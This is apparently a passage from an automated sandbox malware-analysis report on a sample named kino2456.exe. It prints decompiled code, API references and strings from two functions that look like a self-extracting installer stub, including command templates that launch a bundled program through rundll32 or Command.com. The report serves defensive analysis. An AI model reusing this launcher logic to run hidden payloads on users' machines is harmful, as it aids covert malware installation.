Instruction Fuzzy Hash: D5F0E7B6D01228BBCB12DFE89C45ADEBBBCEB48700F104196A510E2240D6719A108BD1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kino2456.exePID: 6392, Parent PID: 6372COMMON

Execution Graph

Execution Coverage:	28.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	960
Total number of Limit Nodes:	26

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00FC3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00FC3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0xfc9124 =  *0xfc9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0xfc8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0xfc8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E00FC468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E00FC44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0xfc9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00FC1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00FC6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00FC3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0xfc8580;
													if( *0xfc8580 != 0) {
														E00FC2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0xfc8180;
											if( *0xfc8180 == 0) {
												_t146 = 0x4c7;
												E00FC44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0xfc9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0xfc9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00FC6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E00FC44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0xfc9124 = E00FC6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E00FC44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0xfc8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0xfc9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0xfc8a38 & 0x0000ffff;
											_v380 = 0xfc9154;
											_v376 = _t151;
											_v372 = 0xfc91e4;
											_v360 = _t97;
											if( *0xfc8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0xfc9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0xfc8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0xfc9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0xfca288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0xfc9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0xfc9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0xfc8a20;
										if( *0xfc8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E00FC202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E00FC468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0xfc8c42;
									if( *0xfc8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0xfc8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E00FC468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00FC468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00FC1781( &_v276, 0x104, _t130, 0xfc8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00FC468F(_t130, 0xfc9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00fc3baa
0x00fc3bb0
0x00fc3bb7
0x00fc3bc0
0x00fc3bc2
0x00fc3bc9
0x00fc3bcb
0x00fc3bcf
0x00fc3bd3
0x00fc3bd9
0x00fc3bfd
0x00fc3bfd
0x00fc3bff
0x00fc3c03
0x00fc3c03
0x00fc3c11
0x00fc3c16
0x00fc3c19
0x00fc3c28
0x00000000
0x00000000
0x00fc3c30
0x00fc3c39
0x00fc3c40
0x00fc3d13
0x00fc3d15
0x00fc3d21
0x00fc3d26
0x00000000
0x00fc3c4f
0x00fc3c56
0x00fc3c60
0x00fc3c65
0x00fc3c77
0x00fc3c78
0x00fc3c7c
0x00fc3c7e
0x00fc3c82
0x00fc3c82
0x00000000
0x00fc3c7c
0x00fc3c67
0x00fc3c69
0x00fc3c6d
0x00000000
0x00fc3c58
0x00fc3c58
0x00fc3c6e
0x00fc3c6e
0x00fc3c87
0x00fc3c89
0x00fc3d4d
0x00fc3d4f
0x00fc3d50
0x00fc3d52
0x00fc3d9e
0x00fc3da8
0x00fc3daf
0x00fc3db4
0x00fc3db6
0x00fc3f4d
0x00fc3f4d
0x00fc3f4f
0x00fc3f56
0x00fc3f57
0x00fc3f58
0x00fc3f63
0x00fc3f63
0x00fc3dbc
0x00fc3dc0
0x00fc3dc2
0x00fc3de6
0x00fc3de6
0x00fc3de8
0x00fc3f0b
0x00fc3f0b
0x00fc3f0f
0x00fc3f13
0x00fc3f15
0x00fc3f1a
0x00fc3f1c
0x00fc3f46
0x00fc3f47
0x00000000
0x00fc3f47
0x00fc3f1e
0x00fc3f1f
0x00fc3f25
0x00fc3f26
0x00fc3f2a
0x00fc3f2d
0x00fc3fd9
0x00fc3fd9
0x00fc3fda
0x00fc3fda
0x00fc3fe1
0x00fc3fe3
0x00fc3fe3
0x00fc3fe8
0x00000000
0x00fc3fe8
0x00fc3f33
0x00fc3f37
0x00000000
0x00fc3f37
0x00fc3dee
0x00fc3dee
0x00fc3df5
0x00fc3fad
0x00fc3fb9
0x00fc3fc2
0x00fc3fc8
0x00000000
0x00fc3fc8
0x00fc3dfb
0x00fc3dfd
0x00000000
0x00000000
0x00fc3e03
0x00fc3e0a
0x00000000
0x00000000
0x00fc3e15
0x00fc3e17
0x00fc3e19
0x00fc3f94
0x00fc3fa4
0x00fc3f7c
0x00fc3f80
0x00fc3f8b
0x00000000
0x00fc3f8b
0x00fc3e2c
0x00fc3e30
0x00fc3e34
0x00fc3e36
0x00fc3f69
0x00fc3f6e
0x00fc3f70
0x00fc3f76
0x00000000
0x00fc3f76
0x00fc3e3c
0x00fc3e43
0x00fc3e47
0x00fc3e52
0x00fc3e56
0x00fc3e5c
0x00fc3e61
0x00fc3e68
0x00fc3e70
0x00fc3e74
0x00fc3e7c
0x00fc3e80
0x00fc3e82
0x00fc3e82
0x00fc3e87
0x00fc3e87
0x00fc3e8b
0x00fc3e91
0x00fc3e94
0x00fc3e96
0x00fc3e96
0x00fc3e9b
0x00fc3e9b
0x00fc3e9f
0x00fc3ea2
0x00fc3ea4
0x00fc3ea4
0x00fc3ea9
0x00fc3ea9
0x00fc3ead
0x00fc3eb3
0x00fc3eb6
0x00fc3eb8
0x00fc3eb8
0x00fc3ebd
0x00fc3ebd
0x00fc3ec1
0x00fc3ec3
0x00fc3ec5
0x00fc3ec5
0x00fc3eca
0x00fc3eca
0x00fc3ece
0x00fc3ed5
0x00fc3ed9
0x00fc3ee0
0x00fc3ee6
0x00fc3eea
0x00fc3eec
0x00fc3eee
0x00fc3ef3
0x00fc3ef3
0x00fc3ef5
0x00fc3efa
0x00fc3efb
0x00fc3efd
0x00fc3f40
0x00000000
0x00fc3eff
0x00fc3eff
0x00fc3f05
0x00000000
0x00fc3f05
0x00fc3efd
0x00fc3dc7
0x00fc3dce
0x00000000
0x00000000
0x00fc3dd0
0x00fc3dd7
0x00000000
0x00000000
0x00fc3dd9
0x00fc3ddb
0x00000000
0x00000000
0x00fc3ddd
0x00fc3de1
0x00000000
0x00fc3de1
0x00fc3d59
0x00fc3d65
0x00fc3d6a
0x00fc3d6c
0x00000000
0x00000000
0x00fc3d6e
0x00fc3d75
0x00000000
0x00000000
0x00fc3d8f
0x00fc3d96
0x00fc3d98
0x00000000
0x00000000
0x00000000
0x00fc3d98
0x00fc3c8f
0x00fc3c98
0x00fc3cf1
0x00fc3cf3
0x00000000
0x00000000
0x00fc3cfe
0x00fc3d11
0x00000000
0x00000000
0x00000000
0x00fc3d11
0x00fc3c9c
0x00fc3ca5
0x00fc3ca7
0x00000000
0x00000000
0x00fc3cad
0x00fc3cb2
0x00fc3cb7
0x00fc3cc5
0x00000000
0x00000000
0x00fc3ce8
0x00fc3cec
0x00fc3ced
0x00fc3ced
0x00000000
0x00fc3ce8
0x00fc3c9e
0x00000000
0x00fc3c9e
0x00fc3c56
0x00fc3d35
0x00fc3d35
0x00fc3d3c
0x00fc3d48
0x00000000
0x00fc3d48
0x00fc3c03
0x00fc3be2
0x00fc3be7
0x00fc3bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00FC3C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00FC3CDC

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00FC8C42), ref: 00FC3D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00FC3E26
FreeLibrary.KERNEL32(00000000,?,00FC8C42), ref: 00FC3EFF
LocalFree.KERNEL32(?,?,?,?,00FC8C42), ref: 00FC3F1F
FreeLibrary.KERNEL32(00000000,?,00FC8C42), ref: 00FC3F40
LocalFree.KERNEL32(?,?,?,?,00FC8C42), ref: 00FC3F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00FC8C42), ref: 00FC3F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00FC8C42), ref: 00FC3F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00FC8C42), ref: 00FC3FC2

Strings

doza2, xrefs: 00FC3E68
REBOOT, xrefs: 00FC3BE2
POSTRUNPROGRAM, xrefs: 00FC3D60
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC3E74
DoInfInstall, xrefs: 00FC3E1F, 00FC3E24, 00FC3F68
SHOWWINDOW, xrefs: 00FC3C34
RUNPROGRAM, xrefs: 00FC3D05
USRQCMD, xrefs: 00FC3CAD
D, xrefs: 00FC3C19
advpack.dll, xrefs: 00FC3F9D
ADMQCMD, xrefs: 00FC3C9E
<None>, xrefs: 00FC3CC9, 00FC3D7D

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
API String ID: 1032054927-318265796
Opcode ID: 5402433e3a86ecf51b1e7c117e7762fd86e9376eb418ea4e948599d84614a94f
Instruction ID: a2102fdc6a6875c4d96b36ae46ed63ab2682dc2731e20ac61d3b889d7f34da60
Opcode Fuzzy Hash: 5402433e3a86ecf51b1e7c117e7762fd86e9376eb418ea4e948599d84614a94f
Instruction Fuzzy Hash: 6AB1EF7090830B9BD324DF248B47F6B76E4AB857A4F10892DFA86D3191DB74D904FB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00FC1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00FC1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00FC1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00FC1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
					E00FC658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00FC1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00FC66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00FC66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00FC1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00FC1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00FC16B3( &_v1552, 0x400, " ");
										E00FC16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00FC2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00FC171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00FC1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00FC1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00FC44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xfc9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xfc1140, _t156, 8,  &_v268) == 0) {
										 *0xfc9a34 =  *0xfc9a34 & 0xfffffffb;
										if( *0xfc9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E00FC171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xfc9a34 =  *0xfc9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00FC1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00FC1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00FC6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00fc1af3
0x00fc1afa
0x00fc1b07
0x00fc1b09
0x00fc1b1a
0x00fc1b20
0x00fc1b2c
0x00fc1b3b
0x00fc1b40
0x00fc1b2e
0x00fc1b2e
0x00fc1b33
0x00fc1b33
0x00fc1b46
0x00fc1b4c
0x00fc1b52
0x00fc1b57
0x00fc1b5d
0x00fc1b61
0x00fc1b9f
0x00fc1b9f
0x00fc1bb1
0x00fc1bc2
0x00000000
0x00fc1b63
0x00fc1b63
0x00fc1b65
0x00fc1b68
0x00fc1b68
0x00fc1b6a
0x00fc1b6b
0x00fc1b6f
0x00fc1b74
0x00000000
0x00000000
0x00fc1b76
0x00fc1b7b
0x00fc1b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc1b8c
0x00fc1b8c
0x00fc1b98
0x00fc1bc7
0x00fc1bc9
0x00fc1bcc
0x00fc1bd3
0x00fc1d75
0x00fc1d76
0x00fc1d78
0x00fc1d7f
0x00fc1e05
0x00fc1e09
0x00000000
0x00000000
0x00fc1e12
0x00fc1e1b
0x00fc1e73
0x00fc1e21
0x00fc1e21
0x00fc1e28
0x00fc1e37
0x00fc1e3e
0x00fc1e52
0x00fc1e60
0x00fc1e60
0x00fc1e3e
0x00fc1e79
0x00fc1e7b
0x00fc1e84
0x00000000
0x00fc1d9b
0x00fc1d9b
0x00fc1da0
0x00fc1da2
0x00fc1da5
0x00fc1da5
0x00fc1da7
0x00fc1da8
0x00fc1dac
0x00fc1dae
0x00fc1db4
0x00fc1db7
0x00fc1db7
0x00fc1db9
0x00fc1dba
0x00fc1dbe
0x00fc1dc3
0x00fc1dce
0x00fc1dd2
0x00fc1deb
0x00000000
0x00fc1df0
0x00000000
0x00fc1dd2
0x00fc1bf7
0x00fc1bfe
0x00fc1c07
0x00fc1d55
0x00fc1d5a
0x00fc1d5b
0x00fc1d5d
0x00fc1d5e
0x00000000
0x00fc1c1b
0x00fc1c1b
0x00fc1c20
0x00fc1c2c
0x00fc1c33
0x00fc1c38
0x00fc1c3a
0x00fc1c3a
0x00fc1c40
0x00fc1c4b
0x00fc1c4b
0x00fc1c5d
0x00fc1c61
0x00fc1dd4
0x00fc1dd4
0x00fc1dd6
0x00fc1ddb
0x00fc1ddc
0x00fc1dde
0x00fc1d64
0x00fc1d64
0x00fc1d67
0x00fc1d6c
0x00000000
0x00fc1c67
0x00fc1c67
0x00fc1c6d
0x00fc1c72
0x00fc1c74
0x00fc1c74
0x00fc1c8e
0x00fc1c99
0x00fc1cc0
0x00fc1cf8
0x00fc1d07
0x00fc1d23
0x00fc1d09
0x00fc1d14
0x00fc1d1b
0x00fc1d1b
0x00fc1d2b
0x00fc1d2d
0x00fc1d2d
0x00fc1d38
0x00fc1d39
0x00fc1d46
0x00fc1cc2
0x00fc1cc2
0x00fc1ccc
0x00fc1cce
0x00fc1cce
0x00fc1cdb
0x00fc1ce6
0x00fc1cee
0x00fc1cee
0x00fc1e89
0x00fc1e91
0x00fc1e92
0x00fc1e94
0x00fc1e97
0x00fc1ea4
0x00fc1ea4
0x00fc1c61
0x00fc1c07
0x00fc1bd3
0x00fc1b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00FC1BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00FC1BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00FC1C57
GetPrivateProfileIntA.KERNEL32 ref: 00FC1C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00FC1140,00000000,00000008,?), ref: 00FC1CB8
GetShortPathNameA.KERNEL32 ref: 00FC1D1B

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00FC4554

Strings

Version, xrefs: 00FC1CB3
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC1BA0
AdvancedINF, xrefs: 00FC1CAE
DefaultInstall, xrefs: 00FC1C74, 00FC1C87, 00FC1CCE, 00FC1CD3, 00FC1D2D, 00FC1D39
.INF, xrefs: 00FC1BDB
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00FC1D3B
setupx.dll, xrefs: 00FC1D14
Command.com /c %s, xrefs: 00FC1D9B, 00FC1DE8
setupapi.dll, xrefs: 00FC1D23, 00FC1D3A
", xrefs: 00FC1B25
.BAT, xrefs: 00FC1D83
Reboot, xrefs: 00FC1C82

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-852641736
Opcode ID: 7f57f33b5dfb5fe68e0d8d4a996a4fe7625f277d52c20ca90b21327a20f7357e
Instruction ID: 2a072d79fd1398c6b1a1208379e3c532ba20c7d7d5dacbf3055c891daef83ecf
